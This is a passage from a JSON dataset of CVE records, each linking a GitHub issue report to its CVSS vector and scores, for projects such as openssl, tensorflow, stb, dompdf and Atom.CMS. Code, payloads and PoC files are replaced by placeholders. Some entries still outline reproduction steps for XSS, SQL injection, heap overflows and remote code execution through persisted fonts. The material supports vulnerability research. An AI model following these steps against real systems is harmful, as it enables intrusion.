  90980. "Repo_new": "justdan96/tsmuxer",
  90981. "Issue_Created_At": "2021-10-18T14:12:22Z",
  90982. "description": "segmentation fault in APITAG APITAG Hi, I found a segmentation fault. Some info: APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG Run tsmuxer APITAG POC FILETAG ASAN output: ERRORTAG gdb ERRORTAG",
  90983. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90984. "severity": "MEDIUM",
  90985. "baseScore": 5.5,
  90986. "impactScore": 3.6,
  90987. "exploitabilityScore": 1.8
  90988. },
  90989. {
  90990. "CVE_ID": "CVE-2021-46398",
  90991. "Issue_Url_old": "https://github.com/filebrowser/filebrowser/issues/1621",
  90992. "Issue_Url_new": "https://github.com/filebrowser/filebrowser/issues/1621",
  90993. "Repo_new": "filebrowser/filebrowser",
  90994. "Issue_Created_At": "2021-10-16T16:07:16Z",
  90995. "description": "Security Issue APITAG details and report are not disclosed here). Hi, this is Febin, an Independent security researcher. I have found a critical vulnerability in filebrowser. I reported the vulnerability to EMAILTAG from FILETAG . I also reported a private report on the issue via APITAG Link to the Private Report: URLTAG URLTAG Thanks.",
  90996. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90997. "severity": "HIGH",
  90998. "baseScore": 8.8,
  90999. "impactScore": 5.9,
  91000. "exploitabilityScore": 2.8
  91001. },
  91002. {
  91003. "CVE_ID": "CVE-2022-0341",
  91004. "Issue_Url_old": "https://github.com/Vanessa219/vditor/issues/1102",
  91005. "Issue_Url_new": "https://github.com/vanessa219/vditor/issues/1102",
  91006. "Repo_new": "vanessa219/vditor",
  91007. "Issue_Created_At": "2021-10-21T10:02:39Z",
  91008. "description": "\u6240\u89c1\u5373\u6240\u5f97\u6a21\u5f0f\u4f20\u5165\u5b57\u7b26\u4e32 APITAG \u62a5\u9519. \u7f16\u8f91\u6a21\u5f0f wysiwyg \u6240\u89c1\u5373\u6240\u5f97\u6a21\u5f0f \u63cf\u8ff0\u95ee\u9898 APITAG APITAG \u65f6\u62a5\u9519 markdown APITAG APITAG ') \u671f\u5f85\u7684\u7ed3\u679c \u4e0d\u62a5\u9519\uff0c\u4ee3\u7801\u6b63\u5e38\u6267\u884c \u622a\u5c4f\u6216\u5f55\u50cf FILETAG \u7248\u672c\u4fe1\u606f \u7248\u672c\uff1a\"vditor\": APITAG \u64cd\u4f5c\u7cfb\u7edf\uff1amacbook pro \u6d4f\u89c8\u5668\uff1a\u8c37\u6b4c",
  91009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91010. "severity": "MEDIUM",
  91011. "baseScore": 5.4,
  91012. "impactScore": 2.7,
  91013. "exploitabilityScore": 2.3
  91014. },
  91015. {
  91016. "CVE_ID": "CVE-2022-0764",
  91017. "Issue_Url_old": "https://github.com/strapi/strapi/issues/12879",
  91018. "Issue_Url_new": "https://github.com/strapi/strapi/issues/12879",
  91019. "Repo_new": "strapi/strapi",
  91020. "Issue_Created_At": "2022-03-17T15:16:11Z",
  91021. "description": "NUMBERTAG Fix CVETAG . APITAG Bug report Describe the bug There is a security vulnerability in Strapi that prevents our deployment pipeline from running. There is already a fix implemented for NUMBERTAG but upgrading is not on our short term road map for now. It seems like the fix from NUMBERTAG can be copied to NUMBERTAG on NUMBERTAG but since I've never contributed to this repository I was hoping there was someone willing to back port the fix to NUMBERTAG Other information Vulnerability on APITAG [ CVETAG URLTAG Explanation on APITAG URLTAG Commit to NUMBERTAG that fixes the issue: URLTAG",
  91022. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  91023. "severity": "MEDIUM",
  91024. "baseScore": 6.7,
  91025. "impactScore": 5.9,
  91026. "exploitabilityScore": 0.8
  91027. },
  91028. {
  91029. "CVE_ID": "CVE-2022-1515",
  91030. "Issue_Url_old": "https://github.com/tbeu/matio/issues/186",
  91031. "Issue_Url_new": "https://github.com/tbeu/matio/issues/186",
  91032. "Repo_new": "tbeu/matio",
  91033. "Issue_Created_At": "2022-02-17T16:21:15Z",
  91034. "description": "Memory leaks in APITAG Hi, this is an issue found by fuzzing the current master branch; use the OSS-Fuzz harness compiled with APITAG and APITAG to reproduce. The memory leak is in APITAG; the reported sanitizer error is the following: ERRORTAG I attach a testcase that triggers the bug in a tar.gz. FILETAG",
  91035. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91036. "severity": "MEDIUM",
  91037. "baseScore": 5.5,
  91038. "impactScore": 3.6,
  91039. "exploitabilityScore": 1.8
  91040. },
  91041. {
  91042. "CVE_ID": "CVE-2022-2274",
  91043. "Issue_Url_old": "https://github.com/openssl/openssl/issues/18625",
  91044. "Issue_Url_new": "https://github.com/openssl/openssl/issues/18625",
  91045. "Repo_new": "openssl/openssl",
  91046. "Issue_Created_At": "2022-06-22T08:51:51Z",
  91047. "description": "A NUMBERTAG specific heap buffer overflow with NUMBERTAG release. Build APITAG NUMBERTAG on a CPU with A NUMBERTAG my CPU is a Core i NUMBERTAG G7) with: APITAG Run a test: APITAG The sanitizer complains: ERRORTAG",
  91048. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91049. "severity": "CRITICAL",
  91050. "baseScore": 9.8,
  91051. "impactScore": 5.9,
  91052. "exploitabilityScore": 3.9
  91053. },
  91054. {
  91055. "CVE_ID": "CVE-2022-23562",
  91056. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/52676",
  91057. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/52676",
  91058. "Repo_new": "tensorflow/tensorflow",
  91059. "Issue_Created_At": "2021-10-26T11:38:05Z",
  91060. "description": "Undefined behaviour in Range. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG all Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: n/a APITAG installed from (source or binary): source APITAG version (use command below): git HEAD Python version NUMBERTAG Bazel version (if compiling from source NUMBERTAG APITAG version (if compiling from source NUMBERTAG APITAG version: n/a GPU model and memory: n/a You can collect some of this information using our environment capture FILETAG You can also obtain the APITAG version with NUMBERTAG TF NUMBERTAG APITAG NUMBERTAG TF NUMBERTAG APITAG Describe the current behavior URLTAG has undefined behaviour when size is greater than APITAG This leads to the unit test APITAG failing on AARCH NUMBERTAG where the g++ implements different behaviour from NUMBERTAG On NUMBERTAG the result of the cast is large and ve, on AARCH NUMBERTAG it is large and +ve. Neither is incorrect as the behaviour of casting into a type that cannot hold the value is undefined. Describe the expected behavior The code should be written to avoid relying on undefined behaviour of the source. Contributing URLTAG Do you want to contribute a PR? (yes/no): yes Briefly describe your candidate solution(if contributing): Test the variable 'size' for exceeding the greatest possible value that can be safely cast to int NUMBERTAG t and throw an error if found. Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. \n$ bazel test flaky_test_attempts NUMBERTAG test_output=all cache_test_results=no remote_http_cache=\"\" remote_cache_proxy=\"\" noremote_accept_cached config=nonccl verbose_failures PATHTAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. APITAG ERROR: APITAG APITAG APITAG Traceback (most recent call last): File PATHTAG line NUMBERTAG in APITAG v = APITAG NUMBERTAG e NUMBERTAG limit NUMBERTAG File PATHTAG line NUMBERTAG in error_handler return fn( args, kwargs) File PATHTAG line NUMBERTAG in op_dispatch_handler return dispatch_target( args, kwargs) File PATHTAG line NUMBERTAG in range return APITAG limit, delta, name=name) File PATHTAG line NUMBERTAG in _range APITAG name) File PATHTAG line NUMBERTAG in raise_from_not_ok_status raise APITAG from None pylint: disable=protected access ERRORTAG OOM when allocating tensor with shape NUMBERTAG and type float on PATHTAG by allocator cpu APITAG",
  91061. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  91062. "severity": "HIGH",
  91063. "baseScore": 8.8,
  91064. "impactScore": 5.9,
  91065. "exploitabilityScore": 2.8
  91066. },
  91067. {
  91068. "CVE_ID": "CVE-2022-24191",
  91069. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/470",
  91070. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/470",
  91071. "Repo_new": "michaelrsweet/htmldoc",
  91072. "Issue_Created_At": "2022-01-25T18:17:46Z",
  91073. "description": "Heap Overflow in gif_read_lzw. Due to an infinite loop in the APITAG function, the sp variable which belongs heap memory can be arbitrarily modified. The crash happens in this loop: CODETAG FILETAG As sp is consistently incremented, it reaches out of heap memory which causes the crash: sp towards the start of execution: FILETAG sp once the crash happened: FILETAG You can download and attempt the following POC: APITAG FILETAG",
  91074. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91075. "severity": "MEDIUM",
  91076. "baseScore": 5.5,
  91077. "impactScore": 3.6,
  91078. "exploitabilityScore": 1.8
  91079. },
  91080. {
  91081. "CVE_ID": "CVE-2022-24859",
  91082. "Issue_Url_old": "https://github.com/py-pdf/PyPDF2/issues/329",
  91083. "Issue_Url_new": "https://github.com/py-pdf/pypdf/issues/329",
  91084. "Repo_new": "py-pdf/pypdf",
  91085. "Issue_Created_At": "2017-02-17T11:55:45Z",
  91086. "description": "Manipulated inline images can force APITAG into an infinite loop. When you try to get the content stream of FILETAG , APITAG will end up in an infinite loop. So this is probably a security issue because it might be possible to denial of service applications using APITAG The reason is that the last while loop in APITAG URLTAG only terminates when it finds the EI token, but never actually checks if the stream has already ended. So it's as simple as adding a (broken) inline image that doesn't have an EI token at all, like the attached PDF. You can see the infinite loop by running this test script with the attached PDF: CODETAG I will soon prepare a pull request that fixes this issue.",
  91087. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91088. "severity": "MEDIUM",
  91089. "baseScore": 5.5,
  91090. "impactScore": 3.6,
  91091. "exploitabilityScore": 1.8
  91092. },
  91093. {
  91094. "CVE_ID": "CVE-2022-25413",
  91095. "Issue_Url_old": "https://github.com/maxsite/cms/issues/484",
  91096. "Issue_Url_new": "https://github.com/maxsite/cms/issues/484",
  91097. "Repo_new": "maxsite/cms",
  91098. "Issue_Created_At": "2022-02-17T15:24:21Z",
  91099. "description": "Stored Cross Site Scripting (XSS) APITAG NUMBERTAG Stored Cross Site Scripting (XSS)(authenticated) a stored cross site scripting (XSS) in maxsite cms version NUMBERTAG targeted towards web admin through PATHTAG at via the parameter f_tags NUMBERTAG Navigate to admin page, PATHTAG and make a new page NUMBERTAG click in NUMBERTAG insert xss payload APITAG in the parameter f_tags FILETAG NUMBERTAG click save You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time APITAG payload gets executed successfully and we'll get a pop up. FILETAG FILETAG",
  91100. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91101. "severity": "MEDIUM",
  91102. "baseScore": 5.4,
  91103. "impactScore": 2.7,
  91104. "exploitabilityScore": 2.3
  91105. },
  91106. {
  91107. "CVE_ID": "CVE-2022-25488",
  91108. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/257",
  91109. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/257",
  91110. "Repo_new": "thedigicraft/atom.cms",
  91111. "Issue_Created_At": "2022-02-16T14:04:25Z",
  91112. "description": "Unauthorized Sql Injection in PATHTAG . poc ERRORTAG the APITAG output can be found in html source APITAG analysis file PATHTAG line NUMBERTAG without any filter to protect APITAG repair suggestion add some filter about id",
  91113. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91114. "severity": "CRITICAL",
  91115. "baseScore": 9.8,
  91116. "impactScore": 5.9,
  91117. "exploitabilityScore": 3.9
  91118. },
  91119. {
  91120. "CVE_ID": "CVE-2022-25489",
  91121. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/258",
  91122. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/258",
  91123. "Repo_new": "thedigicraft/atom.cms",
  91124. "Issue_Created_At": "2022-02-16T15:32:48Z",
  91125. "description": "Reflected XSS attack in FILETAG with the a parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in FILETAG exp APITAG APITAG analysis FILETAG line NUMBERTAG without any filter. APITAG",
  91126. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91127. "severity": "MEDIUM",
  91128. "baseScore": 5.4,
  91129. "impactScore": 2.7,
  91130. "exploitabilityScore": 2.3
  91131. },
  91132. {
  91133. "CVE_ID": "CVE-2022-25514",
  91134. "Issue_Url_old": "https://github.com/nothings/stb/issues/1286",
  91135. "Issue_Url_new": "https://github.com/nothings/stb/issues/1286",
  91136. "Repo_new": "nothings/stb",
  91137. "Issue_Created_At": "2022-02-16T15:20:17Z",
  91138. "description": "heap buffer overflow in function APITAG at APITAG . Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function APITAG at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
  91139. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  91140. "severity": "HIGH",
  91141. "baseScore": 7.5,
  91142. "impactScore": 3.6,
  91143. "exploitabilityScore": 3.9
  91144. },
  91145. {
  91146. "CVE_ID": "CVE-2022-25515",
  91147. "Issue_Url_old": "https://github.com/nothings/stb/issues/1288",
  91148. "Issue_Url_new": "https://github.com/nothings/stb/issues/1288",
  91149. "Repo_new": "nothings/stb",
  91150. "Issue_Created_At": "2022-02-16T15:32:13Z",
  91151. "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function APITAG at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
  91152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91153. "severity": "MEDIUM",
  91154. "baseScore": 6.5,
  91155. "impactScore": 3.6,
  91156. "exploitabilityScore": 2.8
  91157. },
  91158. {
  91159. "CVE_ID": "CVE-2022-25516",
  91160. "Issue_Url_old": "https://github.com/nothings/stb/issues/1287",
  91161. "Issue_Url_new": "https://github.com/nothings/stb/issues/1287",
  91162. "Repo_new": "nothings/stb",
  91163. "Issue_Created_At": "2022-02-16T15:29:22Z",
  91164. "description": "heap buffer overflow in function stbtt__find_table at APITAG Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function stbtt__find_table () at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
  91165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91166. "severity": "MEDIUM",
  91167. "baseScore": 6.5,
  91168. "impactScore": 3.6,
  91169. "exploitabilityScore": 2.8
  91170. },
  91171. {
  91172. "CVE_ID": "CVE-2022-26127",
  91173. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10487",
  91174. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10487",
  91175. "Repo_new": "frrouting/frr",
  91176. "Issue_Created_At": "2022-02-03T02:44:29Z",
  91177. "description": "Miss a check on length in Babel. The code below misses a check on the relationship between packetlen and bodylen before Line NUMBERTAG which may lead to buffer overflows when accessing the memory at Line NUMBERTAG and Line NUMBERTAG URLTAG To fix, we may put the code below before the while loop: ERRORTAG The output of the address sanitizer: ERRORTAG",
  91178. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  91179. "severity": "HIGH",
  91180. "baseScore": 7.8,
  91181. "impactScore": 5.9,
  91182. "exploitabilityScore": 1.8
  91183. },
  91184. {
  91185. "CVE_ID": "CVE-2022-26246",
  91186. "Issue_Url_old": "https://github.com/xiweicheng/tms/issues/15",
  91187. "Issue_Url_new": "https://github.com/xiweicheng/tms/issues/15",
  91188. "Repo_new": "xiweicheng/tms",
  91189. "Issue_Created_At": "2022-02-23T08:11:56Z",
  91190. "description": "There is a cross site scripting vulnerability exists in tms. FILETAG APITAG JS code in the form: APITAG alert (\"XSS\") APITAG FILETAG FILETAG APITAG Save to trigger a pop up window, and the loophole reappearance is completed. FILETAG APITAG cause of the vulnerability is that the input data is not filtered in the foreground page PATHTAG createorupdate, and the input parameters are directly passed into the setting method of APITAG and executed. FILETAG FILETAG",
  91191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  91192. "severity": "MEDIUM",
  91193. "baseScore": 6.1,
  91194. "impactScore": 2.7,
  91195. "exploitabilityScore": 2.8
  91196. },
  91197. {
  91198. "CVE_ID": "CVE-2022-28049",
  91199. "Issue_Url_old": "https://github.com/nginx/njs/issues/473",
  91200. "Issue_Url_new": "https://github.com/nginx/njs/issues/473",
  91201. "Repo_new": "nginx/njs",
  91202. "Issue_Created_At": "2022-02-17T15:51:14Z",
  91203. "description": "Null pointer dereference in APITAG Hi, this bug was found by fuzzing the current master branch, to reproduce build the OSS Fuzz harness with APITAG and APITAG The bug is a write to a NULL pointer, this is the sanitizer report: ERRORTAG I attach the crashing testcase in a tar.gz, you can run it simply giving the testcase as first argument to the harness. FILETAG",
  91204. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91205. "severity": "MEDIUM",
  91206. "baseScore": 5.5,
  91207. "impactScore": 3.6,
  91208. "exploitabilityScore": 1.8
  91209. },
  91210. {
  91211. "CVE_ID": "CVE-2022-28368",
  91212. "Issue_Url_old": "https://github.com/dompdf/dompdf/issues/2598",
  91213. "Issue_Url_new": "https://github.com/dompdf/dompdf/issues/2598",
  91214. "Repo_new": "dompdf/dompdf",
  91215. "Issue_Created_At": "2021-10-12T14:16:06Z",
  91216. "description": "Remote code execution vulnerability through persisted font. A malicious user is able to use Dompdf to execute code remotely under the following conditions: the Dompdf font directory ( PATHTAG by default) is accessible through the web a remote user is able to inject CSS into a document rendered by Dompdf On a vulnerable system a user can reference a specially crafted font file that is able to pass the initial parsing process, at which time Dompdf persists the font file to the font directory with an extension matching that of the file on the remote system. At this point the user is able to load the persisted file to execute code within the context of the PHP process. Recommended mitigations for Dompdf versions prior to NUMBERTAG move Dompdf and/or the Dompdf font directory outside the web root disable access to remote resources by setting the APITAG option to false sanitize user input Vulnerability details are available on the Positive Security blog URLTAG . Refer to the wiki for additional information on securing Dompdf URLTAG .",
  91217. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91218. "severity": "CRITICAL",
  91219. "baseScore": 9.8,
  91220. "impactScore": 5.9,
  91221. "exploitabilityScore": 3.9
  91222. },
  91223. {
  91224. "CVE_ID": "CVE-2022-28990",
  91225. "Issue_Url_old": "https://github.com/wasm3/wasm3/issues/323",
  91226. "Issue_Url_new": "https://github.com/wasm3/wasm3/issues/323",
  91227. "Repo_new": "wasm3/wasm3",
  91228. "Issue_Created_At": "2022-04-07T17:45:08Z",
  91229. "description": "Heap Overflow in WASI read/write API. the WASI API which uses iovs is not check the iovs' buf address and buf length,it would result in out of buffer. run the poc,you will see the memory information leak APITAG If you build with asan,you will see that buffer overflow detected APITAG ./m3 PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f3b4c5ce NUMBERTAG e bp NUMBERTAG ffcdce NUMBERTAG sp NUMBERTAG ffcdce NUMBERTAG c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f3b4c5ce NUMBERTAG d ( PATHTAG ) ............. FILETAG",
  91230. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  91231. "severity": "HIGH",
  91232. "baseScore": 7.8,
  91233. "impactScore": 5.9,
  91234. "exploitabilityScore": 1.8
  91235. },
  91236. {
  91237. "CVE_ID": "CVE-2022-29209",
  91238. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55530",
  91239. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55530",
  91240. "Repo_new": "tensorflow/tensorflow",
  91241. "Issue_Created_At": "2022-04-07T13:53:27Z",
  91242. "description": "Test fail on r NUMBERTAG APITAG . APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG no OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): source APITAG version (use command below NUMBERTAG ge NUMBERTAG fb9c3ad NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source NUMBERTAG APITAG version (if compiling from source): gcc APITAG NUMBERTAG ubuntu NUMBERTAG APITAG version: N/A GPU model and memory: N/A Describe the current behavior test fails Describe the expected behavior test passes Contributing URLTAG Do you want to contribute a PR? (yes/no): yes Briefly describe your candidate solution(if contributing): This code URLTAG appears to return an aliased/out of scope value when called from URLTAG from (commenting out this line causes the test to pass) URLTAG Evidence for 'aliased/out of scope value' above: the following change in APITAG causes the test to pass: CODETAG But we might prefer either: The above Debug whatever is uint NUMBERTAG specific about URLTAG but I can't see that atm Test on a newer gcc, and deprecate NUMBERTAG if that passes Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. CODETAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. FILETAG",
  91243. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  91244. "severity": "MEDIUM",
  91245. "baseScore": 5.5,
  91246. "impactScore": 3.6,
  91247. "exploitabilityScore": 1.8
  91248. },
  91249. {
  91250. "CVE_ID": "CVE-2022-29358",
  91251. "Issue_Url_old": "https://github.com/kevinboone/epub2txt2/issues/22",
  91252. "Issue_Url_new": "https://github.com/kevinboone/epub2txt2/issues/22",
  91253. "Repo_new": "kevinboone/epub2txt2",
  91254. "Issue_Created_At": "2022-04-13T15:29:55Z",
  91255. "description": "Integer overflow bug in _parse_special_tag function, sxmlc.c. Hi, there is a integer overflow bug in _parse_special_tag function, sxmlc.c. URLTAG It passes ((len tag >len_start tag >len_end NUMBERTAG sizeof(SXML_CHAR)) as a parameter to malloc function. If (len tag >len_start tag >len_end NUMBERTAG then (len tag >len_start tag >len_end NUMBERTAG It is legal to use NUMBERTAG as an argument to the malloc function, and it will return the address of a small heap successfully. However, in line NUMBERTAG it passes (len tag >len_start tag >len_end) as a parameter to strncpy function NUMBERTAG will be coerced to an unsigned integer NUMBERTAG ffffffffffffffff. It is a huge size and will make the program crashed. poc: FILETAG To reproduce: ERRORTAG The epub2txt is built with: APITAG Tested on: Ubuntu NUMBERTAG",
  91256. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91257. "severity": "MEDIUM",
  91258. "baseScore": 5.5,
  91259. "impactScore": 3.6,
  91260. "exploitabilityScore": 1.8
  91261. },
  91262. {
  91263. "CVE_ID": "CVE-2022-29362",
  91264. "Issue_Url_old": "https://github.com/SeriaWei/ZKEACMS/issues/457",
  91265. "Issue_Url_new": "https://github.com/seriawei/zkeacms/issues/457",
  91266. "Repo_new": "seriawei/zkeacms",
  91267. "Issue_Created_At": "2022-04-12T02:13:12Z",
  91268. "description": "There is XSS vulnerability that can be able to obtain sensitive user information in the foreground. Reproduction process APITAG in to the back APITAG on the background navigation function. FILETAG APITAG the Add Navigation APITAG xss payload in the header,As shown below. FILETAG APITAG click save and go back to the front page of the cms to trigger the xss vulnerability. FILETAG Restoration suggestions APITAG filters input for pointed brackets. APITAG uses html entity coding output.",
  91269. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91270. "severity": "MEDIUM",
  91271. "baseScore": 5.4,
  91272. "impactScore": 2.7,
  91273. "exploitabilityScore": 2.3
  91274. },
  91275. {
  91276. "CVE_ID": "CVE-2022-30999",
  91277. "Issue_Url_old": "https://github.com/FriendsOfFlarum/upload/issues/68",
  91278. "Issue_Url_new": "https://github.com/friendsofflarum/upload/issues/68",
  91279. "Repo_new": "friendsofflarum/upload",
  91280. "Issue_Created_At": "2017-04-03T16:38:16Z",
  91281. "description": "uploading SVG images fails. flagrow/upload extension version NUMBERTAG flarum version NUMBERTAG beta NUMBERTAG Upload adapter causing issues: local Uploading SVG images fails when they are opened by the image processor. I didn't test it but looking at the code I guess also uploading any image file other that png, jpeg or gif would fail. I think the following lines should be changed: PATHTAG ERRORTAG PATHTAG ERRORTAG",
  91282. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91283. "severity": "MEDIUM",
  91284. "baseScore": 5.4,
  91285. "impactScore": 2.7,
  91286. "exploitabilityScore": 2.3
  91287. },
  91288. {
  91289. "CVE_ID": "CVE-2022-31306",
  91290. "Issue_Url_old": "https://github.com/nginx/njs/issues/481",
  91291. "Issue_Url_new": "https://github.com/nginx/njs/issues/481",
  91292. "Repo_new": "nginx/njs",
  91293. "Issue_Created_At": "2022-03-02T11:45:41Z",
  91294. "description": "SEGV APITAG in APITAG Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  91295. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91296. "severity": "MEDIUM",
  91297. "baseScore": 5.5,
  91298. "impactScore": 3.6,
  91299. "exploitabilityScore": 1.8
  91300. },
  91301. {
  91302. "CVE_ID": "CVE-2022-31620",
  91303. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/70",
  91304. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/70",
  91305. "Repo_new": "thorfdbg/libjpeg",
  91306. "Issue_Created_At": "2022-05-19T03:28:48Z",
  91307. "description": "Assert Failure in APITAG There is an assert failure in APITAG in APITAG . Depending on the usage of this library, e.g., running on remote server as a service, this could cause Deny of Service attack. reproduce steps NUMBERTAG unzip FILETAG NUMBERTAG compile libjpeg with address sanitizer enabled NUMBERTAG run APITAG poc FILETAG stack trace ERRORTAG",
  91308. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91309. "severity": "MEDIUM",
  91310. "baseScore": 6.5,
  91311. "impactScore": 3.6,
  91312. "exploitabilityScore": 2.8
  91313. },
  91314. {
  91315. "CVE_ID": "CVE-2022-32275",
  91316. "Issue_Url_old": "https://github.com/grafana/grafana/issues/50336",
  91317. "Issue_Url_new": "https://github.com/grafana/grafana/issues/50336",
  91318. "Repo_new": "grafana/grafana",
  91319. "Issue_Created_At": "2022-06-07T14:55:11Z",
  91320. "description": "Menus displayed even though user is not authenticated. If an authenticated user accesses the URL APITAG , he gets redirected to APITAG instead of begin redirected to login page. The various menus get displayed which is unexpected. Yet no data is being returned (and a temporary Unauthorized warning pops up). This leads to the following security assessment: FILETAG Hence this is not a security vulnerability. But as it is confusing for the end user it can be considered a UI bug.",
  91321. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  91322. "severity": "HIGH",
  91323. "baseScore": 7.5,
  91324. "impactScore": 3.6,
  91325. "exploitabilityScore": 3.9
  91326. },
  91327. {
  91328. "CVE_ID": "CVE-2022-32275",
  91329. "Issue_Url_old": "https://github.com/grafana/grafana/issues/50341",
  91330. "Issue_Url_new": "https://github.com/grafana/grafana/issues/50341",
  91331. "Repo_new": "grafana/grafana",
  91332. "Issue_Created_At": "2022-06-07T15:06:17Z",
  91333. "description": "Menu on left side displayed with ERRORTAG error page instead of login redirect. If an unauthenticated user accesses the URL APITAG he is displayed a generic ERRORTAG APITAG not found\" error with a menu on the left side instead of being redirected to the login page. Yet no data is being returned when interacting with the menu (and a temporary Unauthorized warning pops up). This leads to the following security assessment: FILETAG Hence this is not a security vulnerability. But as it is confusing for the end user it can be considered a UI bug.",
  91334. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  91335. "severity": "HIGH",
  91336. "baseScore": 7.5,
  91337. "impactScore": 3.6,
  91338. "exploitabilityScore": 3.9
  91339. },
  91340. {
  91341. "CVE_ID": "CVE-2022-32434",
  91342. "Issue_Url_old": "https://github.com/EIPStackGroup/OpENer/issues/374",
  91343. "Issue_Url_new": "https://github.com/eipstackgroup/opener/issues/374",
  91344. "Repo_new": "eipstackgroup/opener",
  91345. "Issue_Created_At": "2022-06-01T21:19:21Z",
